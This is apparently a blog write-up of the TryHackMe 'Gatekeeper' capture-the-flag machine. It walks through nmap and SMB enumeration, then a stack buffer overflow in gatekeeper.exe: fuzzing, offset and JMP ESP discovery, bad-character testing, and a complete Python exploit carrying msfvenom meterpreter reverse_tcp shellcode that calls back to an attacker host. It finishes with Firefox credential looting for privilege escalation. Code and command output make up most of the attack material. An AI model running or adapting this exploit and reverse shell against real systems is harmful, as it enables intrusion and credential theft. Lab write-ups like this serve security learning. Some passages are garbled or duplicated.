Gatekeeper - Buffer Overflow
Note: due to restarting of machine, you may see different IPs
1. Scanning
-sV = Service Version, if an open port is found, it will detect that which service is running on that.
-A = All information like running services versions, OS version and...
-T4 = speed
-oN or -o = Outputs the result in namp_scan file
-v = while scanning is running you are seeing the result line by line
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# cat nmap_scan
# Nmap 7.80 scan initiated Fri Aug 14 04:32:54 2020 as: nmap -sV -A -T4 -oN nmap_scan -v 10.10.15.170
Nmap scan report for 10.10.5.157
Host is up (0.17s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
31337/tcp open Elite?
| fingerprint-strings:
| FourOhFourRequest:
| Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
| Hello
| GenericLines:
| Hello
| Hello
| GetRequest:
| Hello GET / HTTP/1.0
| Hello
| SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_ Hello
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=8/14%Time=5F361409%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r
SF:rOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2eba
SF:k\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01de
SF:fault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n"
SF:);
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:=N%T=80%CD=Z)
Uptime guess: 0.008 days (since Fri Aug 14 04:25:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:af:47:af:7a:ab (unknown)
| Names:
| GATEKEEPER<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| GATEKEEPER<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: gatekeeper
| NetBIOS computer name: GATEKEEPER\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-14T00:35:56-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-14T04:35:56
|_ start_date: 2020-08-14T04:26:12
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 213.37 ms 10.11.0.1
2 213.71 ms 10.10.15.170
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 14 04:37:10 2020 -- 1 IP address (1 host up) scanned in 256.25 seconds
--------------
While scanning is running, I will do a basic nmap scan to check only for the open ports
whenever you see 139, 445 ports open it means that the SMB services are running so start enumerating and see which folders are shared.
------------------------------------------
2. enumerate smb shared folders
-L = list all the shared folders
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient -L 10.10.15.170
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient //10.10.15.170/Users
$ dir
Goto- Share
download the gatekeeper.exe
get gatekeeper.exe
$ quite
download the gatekeeper.exe
get gatekeeper.exe
$ quite
check your root directory the exe file will be there or search it
# locate gatekeeper.exe
---------------------------------------
3. Copy&paste the gatekeeper.exe in your windows OS
copy and paste
or create a python server where your exe file is
or create a python server where your exe file is
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python -m SimpleHTTPServer
--------------------------------
4. Run immunity debugger as administrator
and open gatekeeper.exe
Play
this is also called spiking.
It shows that 3 bytes of data have been received
but we still don't know the exact size of buffer which is also called offset that is between 1 to 150. so let's find it with the help of msf.
write the address in little-endian format
---------------------------------------
5. Fuzzing / identification of the vulnerability
Our fuzzing script. 1_fuzzing.py
import socket
10 to 200, with increments of 10.
counter = 10
fuzz_strings = ["A"]
while len(fuzz_strings) <= 30:
fuzz_strings.append("A" * counter)
counter = counter + 10
for fuzz in fuzz_strings:
print "Fuzzing with %s bytes" % len(fuzz)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.45.153', 31337))
s.send(fuzz + '\r\n\r\n' )
print s.recv(1024)
s.close()
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 1_fuzzing .py
It shows that after 150 bytes of data, the fuzzing stopped.
If we are not wrong the size of buffer is 146 + EIP which is 4 bytes that is equal to 150 bytes.
We have crushed the service with 150 bytes of As
-----------------------------------
6. finding offset (From the beginning of buffer upto EIP) exact size of buffer
First create a pattern of 150 bytes
# msf-pattern_create -l 150
Then when you have runned your python script, copy the value from EIP
# msf-pattern_offset -q (value from EIP)
# msf-pattern_offset -q (value from EIP)
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 2_finding_EiP.py
import socket
attern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"p
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try: print "\nSending evil buffer..." s.connect(('192.168.45.153', 31337)) s.send(pattern + '\r\n\r\n') print s.recv(1024) print "\nDone!."except: print "Could not connect"
Check the application status in debugger which is crushed. Copy the value of EIP which is 3956138.
This is how we create pattern and check the exact size of the buffer
It shows that the buffer size is 146
----------------------------------
7. find JMP ESP
Find a JMP ESP instruction from a DLL that has no ASLR (Address space layout randomization).
To see all the modules in gatekeeper application type
!mona modules
To find the JMP ESP pointers in gatekeeper.exe module type!mona find -s "\xff\xe4" -m gatekeeper.exe
ff is the opcode of JMP e4 is the opcode of ESPHow did we know that its the Operation Code (opcode) of JMP and ESP?
Ok so we have only two pointers in this module
we have 2 addresses which have ASLR and SEH protection off.
write the address in little-endian format
080416BF = b"\xBF\x16\x04\x08"
080414C3 = b"\xC3\x14\x04\x08".
After finding the modules click on any of those two addresses and this screen will appear. right-click on the address --> Breakpoint --> Toggle
you will see that highlighted.
The purpose of setting a toggle is to check if we can hit that address or not so that we can put our payload there.
------------------------------
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b'A' * 146 + b"\xC3\x14\x04\x08"
try:
print "\nSending evil buffer..."
s.connect(('192.168.45.153', 31337))
s.send(buffer + '\r\n\r\n')
print s.recv(1024)
print "\nDone!."
except:
print "Could not connect"
so it means that we hit the address we wanted to.
-------------------------
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b'A' * 146 + b"\xC3\x14\x04\x08"
try:
print "\nSending evil buffer..."
s.connect(('192.168.45.153', 31337))
s.send(buffer + '\r\n\r\n')
print s.recv(1024)
print "\nDone!."
except:
print "Could not connect"
8. find the bad characters
Find badchars with Mona
Type below command and it creates two files where your
debugger and monna is installed.
file 1: bytearray.txt
file 2: bytearray.bin
!mona bytearray -b "\x00"
open bytearray.txt file and copy the badchars and paste it in your python script.
you can also find the bad characters by googling.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = b"A" * 146 + b"B" * 4 + badchars
try:
print "\nSending evil buffer..."
s.connect(('192.168.45.153', 31337))
s.send(buffer + '\r\n\r\n')
s.close()
print "\nDone!"
except:
print "Could not connect"
4_finding_badchars.py
!mona compare -f bytearray.bin -a 005519F8
so we found that the badchars are 00, 0a so we must exclude that from our payload.
Manually finding of badchars:
If you see any of these three things so it means that its a badchar:
1. Break of flow like: (1,2,5,4,3,6,7,8,9)
2. Repeatative like: (1,2,2,3,4,5,6,7,8,9)
3. Completely removed: (the characters won't be shown at all) 1,2,3,5,6,7,8,9
1. Break of flow like: (1,2,5,4,3,6,7,8,9)
2. Repeatative like: (1,2,2,3,4,5,6,7,8,9)
3. Completely removed: (the characters won't be shown at all) 1,2,3,5,6,7,8,9
-----------------------------
9. create shellcode
we put the the
!msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.12.255 LPORT=443 -b "\00\0a" -f python --var-name shellcode
!msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.12.255 LPORT=443 -b "\00\0a" -f python --var-name shellcode
Output of msfvenom
------------------------------
10. open listener in Metasploit
Run the python script
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.11.12.255 LPORT=443 -f py-b "\x00\x0a" --var-name shellcode
shellcode = b""
shellcode += b"\xdd\xc2\xd9\x74\x24\xf4\xbe\x7b\x43\xab\xc2"
shellcode += b"\x5a\x2b\xc9\xb1\x56\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x6f\xa1\x5e\x3e\x67\xa7\xa1\xbf\x77"
shellcode += b"\xc8\x28\x5a\x46\xc8\x4f\x2e\xf8\xf8\x04\x62"
shellcode += b"\xf4\x73\x48\x97\x8f\xf6\x45\x98\x38\xbc\xb3"
shellcode += b"\x97\xb9\xed\x80\xb6\x39\xec\xd4\x18\x00\x3f"
shellcode += b"\x29\x58\x45\x22\xc0\x08\x1e\x28\x77\xbd\x2b"
shellcode += b"\x64\x44\x36\x67\x68\xcc\xab\x3f\x8b\xfd\x7d"
shellcode += b"\x34\xd2\xdd\x7c\x99\x6e\x54\x67\xfe\x4b\x2e"
shellcode += b"\x1c\x34\x27\xb1\xf4\x05\xc8\x1e\x39\xaa\x3b"
shellcode += b"\x5e\x7d\x0c\xa4\x15\x77\x6f\x59\x2e\x4c\x12"
shellcode += b"\x85\xbb\x57\xb4\x4e\x1b\xbc\x45\x82\xfa\x37"
shellcode += b"\x49\x6f\x88\x10\x4d\x6e\x5d\x2b\x69\xfb\x60"
shellcode += b"\xfc\xf8\xbf\x46\xd8\xa1\x64\xe6\x79\x0f\xca"
shellcode += b"\x17\x99\xf0\xb3\xbd\xd1\x1c\xa7\xcf\xbb\x48"
shellcode += b"\x04\xe2\x43\x88\x02\x75\x37\xba\x8d\x2d\xdf"
shellcode += b"\xf6\x46\xe8\x18\x8f\x41\x0b\xf6\x37\x01\xf5"
shellcode += b"\xf7\x47\x0b\x32\xa3\x17\x23\x93\xcc\xfc\xb3"
shellcode += b"\x1c\x19\x68\xbe\x8a\xa8\x67\xb2\xb5\xc5\x75"
shellcode += b"\xca\x48\xad\xf0\x2c\x1a\x81\x52\xe1\xdb\x71"
shellcode += b"\x12\x51\xb4\x9b\x9d\x8e\xa4\xa3\x74\xa7\x4f"
shellcode += b"\x4c\x20\x9f\xe7\xf5\x69\x6b\x99\xfa\xa4\x11"
shellcode += b"\x99\x71\x4c\xe5\x54\x72\x25\xf5\x81\xe5\xc5"
shellcode += b"\x05\x52\x80\xc5\x6f\x56\x02\x92\x07\x54\x73"
shellcode += b"\xd4\x87\xa7\x56\x67\xcf\x58\x27\x51\xbb\x6f"
shellcode += b"\xbd\xdd\xd3\x8f\x51\xdd\x23\xc6\x3b\xdd\x4b"
shellcode += b"\xbe\x1f\x8e\x6e\xc1\xb5\xa3\x22\x54\x36\x95"
shellcode += b"\x97\xff\x5e\x1b\xc1\xc8\xc0\xe4\x24\x4b\x06"
shellcode += b"\x1a\xba\x64\xaf\x72\x44\x35\x4f\x82\x2e\xb5"
shellcode += b"\x1f\xea\xa5\x9a\x90\xda\x46\x31\xf9\x72\xcc"
shellcode += b"\xd4\x4b\xe3\xd1\xfc\x0a\xbd\xd2\xf3\x96\x4e"
shellcode += b"\xa8\x7c\x28\xaf\x4d\x95\x4d\xb0\x4d\x99\x73"
shellcode += b"\x8d\x9b\xa0\x01\xd0\x1f\x97\x1a\x67\x3d\xbe"
shellcode += b"\xb0\x87\x11\xc0\x90"
offset = 146
address = b"\xC3\x14\x04\x08" #JMP ESP address 080414C3
payload = "A" * offset + address + b"\x90" * 16 + shellcode + "B" * 100
try:
print "\nSending payload..."
s.connect(('10.10.107.92', 31337))
s.send(payload + '\r\n\r\n')
print "\nDone!."
except:
print "Could not connect"
5_Shellcode.py
we got meterpreter
--------------------------------
11. First flag --> cat user.txt.taxt
----------------------------------------------------------------
12. Privilege Escalation
Let's Enumerate Applications:
Enumerate firefox
four files downloaded in /root/.msf4/loot/
Donwloaded files
Before renaming
--------------------------------------
13. download firefox decryptor tool
https://github.com/unode/firefox_decrypt
git clone https://github.com/unode/firefox_decrypt.git
git clone https://github.com/unode/firefox_decrypt.git
Comments
Post a Comment